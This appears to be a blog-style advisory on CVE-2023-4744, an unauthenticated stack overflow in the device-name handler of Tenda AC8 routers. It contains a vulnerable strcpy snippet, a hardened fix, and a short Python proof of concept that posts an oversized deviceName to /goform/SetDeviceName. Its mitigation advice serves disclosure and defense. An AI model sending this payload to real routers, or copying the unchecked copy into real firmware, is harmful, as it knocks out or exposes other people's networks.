In late 2023, a serious vulnerability (CVE-2023-4744, VDB-238633) was found in Tenda AC8 routers running firmware 16.03.34.06_cn_TDC01. The bug is in the formSetDeviceName function and lets remote attackers crash the router or run their own code—no login needed.
This post covers how the bug works, shows proof-of-concept code, and explains the risks, with links to the sources that first disclosed the exploit.
What's the Problem?
A function called formSetDeviceName is responsible for handling requests that set the device's name. Unfortunately, it doesn't properly check how big the input is, causing a stack-based buffer overflow when too much data is sent. This means an attacker can send a crafted request and take control of the router.
- CVE ID: CVE-2023-4744
- VDB ID: VDB-238633
Vulnerable code pattern
In the router firmware’s code for formSetDeviceName, user-supplied values are copied into a fixed-size buffer without size checking. For instance (based on analysis):
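    #include <string.h>

    /* Illustrative request type; the firmware's real structure is not shown here. */
    struct request { const char *devicename; };

    void formSetDeviceName(struct request *request) {
        char devicename[32];
        // ...
        strcpy(devicename, request->devicename); // No bounds checking!
        // ...
    }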
If the attacker sends a device name longer than 32 bytes, it will overwrite nearby memory—the classic stack buffer overflow.
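A hardened counterpart to the pattern above, as an added example that is not taken from Tenda's firmware or from the original disclosure. It measures the input against the 32-byte buffer before copying and rejects oversized names instead of truncating them; the `struct request` type, the `name_status` codes and the function name `copy_device_name` are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define DEVNAME_MAX 32  /* buffer size from the pattern above, including the NUL */

/* Hypothetical request type; the real firmware structure is an assumption here. */
struct request { const char *devicename; };

enum name_status { NAME_OK = 0, NAME_MISSING = -1, NAME_TOO_LONG = -2, NAME_BAD_CHAR = -3 };

/* Copy the device name only if it fits in out[DEVNAME_MAX]; reject, never truncate. */
enum name_status copy_device_name(const struct request *req, char out[DEVNAME_MAX])
{
    if (req == NULL || req->devicename == NULL)
        return NAME_MISSING;

    /* memchr bounds the scan to the buffer size, so a huge value is never walked in full. */
    const char *end = memchr(req->devicename, '\0', DEVNAME_MAX);
    if (end == NULL)
        return NAME_TOO_LONG;               /* 32 or more bytes before any NUL */

    size_t len = (size_t)(end - req->devicename);
    if (len == 0)
        return NAME_MISSING;

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)req->devicename[i];
        if (c < 0x20 || c == 0x7f)
            return NAME_BAD_CHAR;           /* no control characters in a display name */
    }

    memcpy(out, req->devicename, len + 1);  /* len + 1 <= DEVNAME_MAX, NUL included */
    return NAME_OK;
}

int main(void)
{
    char name[DEVNAME_MAX];
    char oversized[129];                    /* constructed sample input: 128 'A' bytes */
    memset(oversized, 'A', 128);
    oversized[128] = '\0';
    struct request good = { "LivingRoom-AP" }, bad = { oversized };
    printf("good: %d\n", copy_device_name(&good, name));
    printf("oversized: %d\n", copy_device_name(&bad, name));
    return 0;
}
```

A handler built this way should return an HTTP error on any status other than `NAME_OK`, so the oversized request is refused before it reaches a stack buffer.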
Attack Scenario
The attacker only needs to send a specially crafted HTTP POST request to the /goform/SetDeviceName endpoint, providing an oversized deviceName parameter. No login or special rights are needed.
A sample exploit uses:
- URL: http://[router_ip]/goform/SetDeviceName
Proof-of-Concept Exploit
Below is a simple Python exploit showing how to crash the device or potentially gain code execution. It sends a POST request with an oversized device name.
    import requests

    router_ip = "192.168.0.1"  # Replace with actual router IP
    payload = "A" * 128  # Overflow the buffer (far above the 32 bytes expected)
    url = f"http://{router_ip}/goform/SetDeviceName"

    # Form body carrying the oversized device name
    data = {
        "deviceName": payload
    }

    resp = requests.post(url, data=data)
    print(f"Status: {resp.status_code}")
    if resp.status_code == 200:
        print("Payload sent, router may crash or become unresponsive.")
    else:
        print("Failed to send payload, check connection.")
- Code Execution: Skilled attackers could craft payloads that let them run commands on the router.
- Network Takeover: Since routers control network traffic, this could let hackers surveil, redirect, or completely control your traffic.
Original Disclosure & References
- VulDB: VDB-238633
- Exploit Database Entry (in some cases, check if an up-to-date PoC is available)
- CVE Details – CVE-2023-4744
- Security Focus write-up
How to Protect Yourself
1. Update firmware: Check Tenda’s official site for firmware updates. If your model/region doesn’t have an update, demand a fix from support.
2. Restrict access: Keep the router’s management interface off the WAN. Use strong Wi-Fi and admin passwords.
3. Firewalls/Segmentation: Block untrusted network segments from reaching router management ports.
Conclusion
CVE-2023-4744 is easy to exploit and critical for home and small office users using Tenda AC8 routers on the affected firmware. If you run such a device, update it right away or consider replacing it if updates aren’t available. Attackers can remotely break into or crash networks by simply sending a long name value—don’t let yours be next.
Stay safe and always keep your devices patched!
*This write-up is exclusive to this post and summarizes current public research and exploit details as of June 2024.*
Timeline
Published on: 09/04/2023 00:15:07 UTC
Last modified on: 11/07/2023 04:22:55 UTC